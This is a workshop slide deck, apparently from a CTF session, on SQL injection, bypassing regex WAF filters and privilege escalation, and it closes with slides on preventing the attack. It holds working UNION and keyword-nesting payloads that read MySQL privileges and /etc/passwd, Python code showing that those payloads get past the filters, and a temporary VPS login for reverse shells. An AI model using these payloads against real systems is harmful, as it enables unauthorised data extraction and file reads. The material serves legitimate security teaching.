Slide 1

Slide 1 text

No content

Slide 2

Slide 2 text

RULES
• No DDoSing the servers
• You can use whatever tools you want
• Goal is to exploit the web app and root the box, then capture the flag inside the /root/ folder
• Credentials for a temporary VPS to get a reverse shell
• [email protected]:ilovelinux123

Slide 3

Slide 3 text

No content

Slide 4

Slide 4 text

START HACKING! 873067175 [email protected]:ilovelinux123

Slide 5

Slide 5 text

ABOUT ME
• Not any geek or any nerd ;-)
• https://osandamalith.com
• Passionate about Penetration Testing and Reverse Engineering
• IT Security Consultant at ZeroDayLab, London.
• Currently holds: OSCE, OSCP, OSWP, CREST CRTPEN, eCRE, eWPTX, eCPPTX, eCPPT
• Author of a few vulnerabilities and 0days: https://www.exploit-db.com/?author=6712
• I love to make things, break things and make things that break things ;)
• DJ at Ministry of Sound, London, UK

Slide 6

Slide 6 text

No content

Slide 7

Slide 7 text

ALL MY EXPLOITS INSIDE KALI
• grep -rnw '/usr/share/exploitdb/exploits/' -e 'Osanda'

Slide 8

Slide 8 text

• https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html
• https://www.theregister.co.uk/2018/09/19/ee_modem_vuln/

Slide 9

Slide 9 text

No content

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

BUG BOUNTY VS PENTESTING

Slide 12

Slide 12 text

No content

Slide 13

Slide 13 text

No content

Slide 14

Slide 14 text

PENETRATION PROCESS
• Information Gathering
• Scanning
• Enumeration
• VA & Exploitation
• Post Exploitation

Slide 15

Slide 15 text

SQL INJECTION

Slide 16

Slide 16 text

No content

Slide 17

Slide 17 text

SQL Injection
• Intention: extracting data, bypassing auth, privilege escalation, etc.
• Source of vulnerability: user input, HTTP headers, second-order injection, files, etc.
• Exploitation technique: in-band, out-of-band, inference

Slide 18

Slide 18 text

SQLi Exploitation Techniques
• In-band: union-based, error-based
• Out-of-band: HTTP, DNS, email
• Inference: boolean-based, time-based

Slide 19

Slide 19 text

MY ERROR-BASED RESEARCH
• Error Based SQL Injection Using EXP
  • https://osandamalith.com/2015/07/15/error-based-sql-injection-using-exp/
  • https://www.exploit-db.com/papers/37953
• BIGINT Overflow Error Based SQL Injection
  • https://osandamalith.com/2015/07/08/bigint-overflow-error-based-sql-injection/
  • https://www.exploit-db.com/papers/37733

Slide 20

Slide 20 text

MYSQL OUT OF BAND HACKING
• https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/
• https://www.exploit-db.com/papers/41273
• https://packetstormsecurity.com/files/140832/MySQL-OOB-Hacking.html

Slide 21

Slide 21 text

VULNERABLE QUERY
• $query = "SELECT id,name,join_date,title FROM members WHERE name = '" . $member_name . "';";
• SELECT id,name,join_date,title FROM members WHERE name = 'Ergo';
• SELECT id,name,join_date,title FROM members WHERE name = 'Ergo' UNION SELECT 1,2,3,4;
• SELECT id,name,join_date,title FROM members WHERE name = 'Ergo' UNION SELECT @@version,2,3,4;
• The trailing ';' that the PHP appends still has to parse: either comment it out or re-balance the quote at the end of the injected value, as the later payloads do with &&1='1 and ||1='1.
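A runnable version of this lookup, added here as an example rather than taken from the slides: Python's sqlite3 module stands in for MySQL so it runs offline, the `members` and `users` tables and their rows are constructed, and `@@version` is replaced by SQLite's `sqlite_version()`. It builds the query by string concatenation exactly as the PHP does, pushes the slide's UNION payloads through it, and shows the same payloads returning nothing when the value is bound as a parameter instead.

```python
import sqlite3

# Added example, not code from the deck. sqlite3 (in-memory) stands in for
# MySQL; the tables and rows below are constructed sample data.
MEMBERS = [
    (1, "Ergo", "2018-01-10", "Admin"),
    (2, "Alice", "2018-03-04", "Member"),
]
# A second table standing in for whatever the attacker actually wants to read.
USERS = [("dba", "hunter2")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, name TEXT, join_date TEXT, title TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?, ?)", MEMBERS)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, member_name: str):
    # Same construction as the slide's PHP: the value becomes part of the SQL text.
    query = "SELECT id,name,join_date,title FROM members WHERE name = '" + member_name + "';"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, member_name: str):
    # Parameterised: the statement is parsed first, the value is bound afterwards,
    # so nothing in the value can change the statement's shape.
    return conn.execute(
        "SELECT id,name,join_date,title FROM members WHERE name = ?", (member_name,)
    ).fetchall()


# The slide's UNION payloads as the attacker would submit them. The trailing
# comment swallows the closing quote and semicolon that the PHP appends.
VERSION_PAYLOAD = "Ergo' UNION SELECT sqlite_version(),2,3,4-- "
CREDS_PAYLOAD = "Ergo' UNION SELECT 1,username,password,4 FROM users-- "


def leaked_credentials(conn: sqlite3.Connection):
    """(username, password) pairs the attacker gets back that are not legitimate member rows."""
    legit = set(MEMBERS)
    rows = lookup_vulnerable(conn, CREDS_PAYLOAD)
    return {(r[1], r[2]) for r in rows if r not in legit}


def breaks_on_apostrophe(conn: sqlite3.Connection, member_name: str) -> bool:
    """True when the concatenated query fails to parse: the usual first sign of injection."""
    try:
        lookup_vulnerable(conn, member_name)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, VERSION_PAYLOAD))   # legitimate row plus (version, 2, 3, 4)
    print(leaked_credentials(db))                   # {('dba', 'hunter2')}
    print(lookup_safe(db, CREDS_PAYLOAD))           # [] - bound value matches no name
    print(breaks_on_apostrophe(db, "O'Brien"))      # True - same root cause as the injection
```

The `breaks_on_apostrophe` check is the thing to try first during testing: a legitimate value containing a quote that produces a database error is the same defect the UNION payload exploits, just without the attacker's follow-through.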

Slide 22

Slide 22 text

WEB APPLICATION FIREWALLS

Slide 23

Slide 23 text

WAFS!
    if (isset($_REQUEST['member_name']) && $_REQUEST['member_name'] !== '') {
        $member_name = $_REQUEST['member_name'];
        // Single-pass, case-insensitive deletion: a keyword nested inside itself survives.
        $member_name = preg_replace("/union|select/i", "", $member_name);
        $member_name = preg_replace("/into|outfile|dumpfile|[#]|[--]/i", "nope", $member_name);
        // The parentheses are the PCRE delimiters, so this is the case-sensitive pattern or|and|OR|AND.
        $member_name = preg_replace("(or|and|OR|AND)", "nope", $member_name);
        $connection = @mysqli_connect(MYSQLHOST, MYSQLUSER, MYSQLPASS, MYSQLDB);
        // the vulnerable query from slide 21 is built from $member_name and executed here
    }

Slide 24

Slide 24 text

WAFS!
    if (preg_match('/UNION|SELECT|union|select|\s/', $workaround)) {
        // No /i flag: only all-upper and all-lower spellings match, but \s rejects any whitespace.
        echo "SQL Injection Attempt Detected!";
    }

Slide 25

Slide 25 text

WHEN /OR/i IS FILTERED.
• https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/
• https://www.exploit-db.com/papers/41274
• https://packetstormsecurity.com/files/140831/Alternative-For-Information_Schema.Tables-In-MySQL.html

Slide 26

Slide 26 text

No content

Slide 27

Slide 27 text

No content

Slide 28

Slide 28 text

MYSQL PRIVILEGES
• File_priv
• Enables reading and writing files on the server host using the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. A user who has the FILE privilege can read any file on the server host that is either world-readable or readable by the MySQL server. (This implies the user can read any file in any database directory, because the server can access any of those files.)
• Enables creating new files in any directory where the MySQL server has write access. This includes the server's data directory containing the files that implement the privilege tables.
• Check secure_file_priv as well (SHOW VARIABLES LIKE 'secure_file_priv'): since MySQL 5.7.6 its default is no longer empty, so LOAD_FILE() and INTO OUTFILE are confined to that one directory, and when it is NULL they are disabled entirely even though FILE is granted.

Slide 29

Slide 29 text

CHECKING PRIVILEGES

Slide 30

Slide 30 text

• select File_priv from mysql.user where user = substring_index(user(), '@', 1);
• null'unUNIONiOn/**/selSELECTeCt/**/1,File_Priv,3,4/**/from/**/mysql.user/**/where/**/user=substring_index(user(),'@',1)&&1='1
• Each keyword is nested inside itself so the single-pass strip leaves a valid one behind, /**/ replaces the whitespace that the detector rejects, and && stands in for the filtered and.

Slide 31

Slide 31 text

PASSWD FILE
• null'uNunionIoN/**/SeLselectEcT/**/1,load_file('/etc/passwd'),3,4||1='1
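The filters from slides 23 and 24 re-implemented in Python (an added example, not the deck's code) so that the payloads from slides 30 and 31 can be pushed through them offline. The PCRE semantics are reproduced rather than the PHP syntax: `[#]|[--]` is just the literals `#` and `-`, and `(or|and|OR|AND)` uses the parentheses as delimiters, so it is case-sensitive. One assumption is labelled in the code: the `preg_match()` detector is taken to run on the already-sanitised value. The block also shows why slide 25 exists (`information_schema` contains `or`) and that a fully mixed-case nested keyword gets past both stages whichever order they run in.

```python
import re

# Added example: Python mirrors of the two PHP filters on the WAF slides.


def stage1_strip(value: str) -> str:
    """Mirror of the three preg_replace() calls from slide 23."""
    # Single pass, case-insensitive deletion. The engine never re-scans the text it
    # just produced, so a keyword nested inside itself leaves a valid keyword behind.
    value = re.sub(r"union|select", "", value, flags=re.IGNORECASE)
    # PHP's "[#]|[--]" is the same as the literals "#" and "-".
    value = re.sub(r"into|outfile|dumpfile|#|-", "nope", value, flags=re.IGNORECASE)
    # No /i flag in the PHP: "Or" or "aNd" are left untouched.
    value = re.sub(r"or|and|OR|AND", "nope", value)
    return value


def stage2_detects(value: str) -> bool:
    """Mirror of preg_match('/UNION|SELECT|union|select|\\s/', ...) from slide 24."""
    return re.search(r"UNION|SELECT|union|select|\s", value) is not None


def passes_waf(value: str):
    """Assumption: sanitise first, then run the detector on the sanitised value.
    Returns the string the database would see, or None if it was blocked."""
    cleaned = stage1_strip(value)
    return None if stage2_detects(cleaned) else cleaned


def mangled_by_filter(identifier: str) -> bool:
    """True when stage 1 rewrites an identifier the query needs verbatim."""
    return stage1_strip(identifier) != identifier


# Payloads exactly as they appear on slides 30 and 31.
FILE_PRIV_PAYLOAD = (
    "null'unUNIONiOn/**/selSELECTeCt/**/1,File_Priv,3,4/**/from/**/mysql.user"
    "/**/where/**/user=substring_index(user(),'@',1)&&1='1"
)
PASSWD_PAYLOAD = "null'uNunionIoN/**/SeLselectEcT/**/1,load_file('/etc/passwd'),3,4||1='1"


if __name__ == "__main__":
    print(passes_waf("' union select 1,2,3,4-- "))   # None: the spaces alone trip stage 2
    print(passes_waf(FILE_PRIV_PAYLOAD))              # null'uniOn/**/seleCt/**/...
    print(passes_waf(PASSWD_PAYLOAD))                 # null'uNIoN/**/SeLEcT/**/...
    # The "or" inside information_schema is rewritten, which is why slide 25
    # needs an alternative table.
    print(stage1_strip("information_schema.tables"))  # infnopemation_schema.tables
    # Had the detector run on the raw input it would catch the inner UNION;
    # full mixed case dodges both stages regardless of order.
    print(stage2_detects("unUNIONiOn"), stage2_detects("unUnIoNiOn"))
    print(stage1_strip("unUnIoNiOn"))                 # uniOn
```

`mangled_by_filter` is the quick way to list which identifiers a given deny-list breaks before building a payload; anything it flags (here `information_schema`, `password`) has to be replaced by an equivalent the filter does not touch.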

Slide 32

Slide 32 text

SOURCE CODE REVIEW

Slide 33

Slide 33 text

SOURCE CODE REVIEW! • /var/www/html/auth.php

Slide 34

Slide 34 text

INVESTIGATING THE COOKIE FUNCTIONS • /var/www/html/includes/security.php

Slide 35

Slide 35 text

EVAL IS DANGEROUS https://osandamalith.com/2017/05/11/cmsms-2-1-6-multiple-vulnerabilities/

Slide 36

Slide 36 text

CREATING A COOKIE

Slide 37

Slide 37 text

OUR EXPLOIT!

Slide 38

Slide 38 text

PWNED!

Slide 39

Slide 39 text

ROOT THE BOX! PRIVILEGE ESCALATION
• System and network information
• User information
• Privileged access / cleartext credentials
• Services
• Jobs/tasks
• Installed software version information

Slide 40

Slide 40 text

CAPTURE THE FLAG [CTF]

Slide 41

Slide 41 text

No content

Slide 42

Slide 42 text

SQLI PREVENTION
• Use prepared statements and parameterized queries
• Using PHP Data Objects (PDO)
    $stmt = $pdo->prepare('SELECT * FROM employees WHERE name = :name');
    $stmt->execute(array('name' => $name));
    foreach ($stmt as $row) {
        // Do something with $row
    }
• Works with every database driver PDO supports, so it is the portable option.
• With the MySQL driver, set PDO::ATTR_EMULATE_PREPARES to false so the placeholders are bound on the server rather than interpolated client-side by PDO.

Slide 43

Slide 43 text

SQLI PREVENTION
• Using MySQLi Extension (MySQL Improved)
    $stmt = $dbConnection->prepare('SELECT * FROM employees WHERE name = ?');
    $stmt->bind_param('s', $name); // 's' specifies the variable type => 'string'
    $stmt->execute();
    $result = $stmt->get_result();
    while ($row = $result->fetch_assoc()) {
        // Do something with $row
    }
• get_result() needs the mysqlnd driver; without it, use bind_result() and fetch() instead.

Slide 44

Slide 44 text

ALL MY RESEARCH ON SQL INJECTION
• https://osandamalith.com/tag/mysql/

Slide 45

Slide 45 text

ANY QUESTIONS?